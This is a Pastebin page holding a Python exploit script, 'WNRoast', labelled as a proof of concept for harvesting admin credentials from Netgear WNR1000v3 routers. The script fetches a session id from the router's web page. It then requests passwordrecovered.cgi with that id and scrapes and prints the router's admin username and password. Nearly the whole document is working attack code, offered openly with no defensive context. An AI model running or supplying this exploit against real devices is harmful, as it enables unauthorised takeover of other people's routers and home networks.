daily pastebin goal
77%
SHARE
TWEET

wnroast.py

a guest Jun 15th, 2014 1,095 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ######################################################################################
  2. # WNRoast Version 1.0                                                                #
  3. # Netgear WNR1000v3 Credential Harvesting Exploit (Proof of Concept)                 #
  4. # Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA  #
  5. # By: c1ph04                                                                         #
  6. #                                                                                    #
  7. # Not the prettiest, but I need to get this done before the baby wakes up            #
  8. ######################################################################################
  9.  
  10. import socket
  11. import urllib
  12. import urllib2
  13. import sys
  14.  
  15. CRLF = "\r\n"
  16.  
  17. request = [
  18.     "GET / HTTP/1.1",
  19.     "Host: none",
  20.     "Connection: Close",
  21.     "",
  22.     "",
  23. ]
  24. #---------------------------------------------------
  25.  
  26. s = socket.socket()
  27. s.connect((sys.argv[1], int(sys.argv[2])))
  28.  
  29. s.send(CRLF.join(request))
  30.  
  31. response = ''
  32. buffer = s.recv(4096)
  33. while buffer:
  34.     response += buffer
  35.     buffer = s.recv(4096)
  36.  
  37. header_data, _, body = response.partition(CRLF + CRLF)
  38.  
  39. #-----------------------------------------------------
  40.  
  41. def extract_between(text, sub1, sub2, nth=1):
  42.  
  43.     if sub2 not in text.split(sub1, nth)[-1]:
  44.         return None
  45.     return text.split(sub1, nth)[-1].split(sub2, nth)[0]
  46.  
  47. text = body
  48.  
  49. uid = (repr(extract_between(text, 'id=', '\"')))
  50.  
  51. uid = uid.replace("\'", '')
  52.  
  53. #-----------------------------------------------------
  54.  
  55. # Send POST To Get Credentials
  56.  
  57. ip = sys.argv[1]
  58.  
  59. ip = ip.replace("\'", '')
  60.  
  61. port = sys.argv[2]
  62.  
  63. port = port.replace("\'", '')
  64.  
  65. url = 'http://' + ip + ':' + port + '/passwordrecovered.cgi?id=' + uid
  66.  
  67. data = ''
  68. req = urllib2.Request(url, data)
  69. response = urllib2.urlopen(req)
  70. the_page = response.read()
  71.  
  72. #-------------------------------------------------------
  73.  
  74. username = (repr(extract_between(the_page, 'Router Admin Username</td>', '</td>')))
  75. username = (repr(extract_between(username, '>', '\'')))
  76. username = username.replace("\'", '')
  77.  
  78. password = (repr(extract_between(the_page, 'Router Admin Password</td>', '</td>')))
  79. password = (repr(extract_between(password, '>', '\'')))
  80. password = password.replace("\'", '')
  81.  
  82. print """
  83.  
  84.  WNRoast Version 1.0
  85.  =========================
  86.  By: c1ph04
  87.  
  88.  """
  89. print "\n WNRoasted!\n"
  90. print " Username is: " + username + '\n'
  91. print " Password is: " + password
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top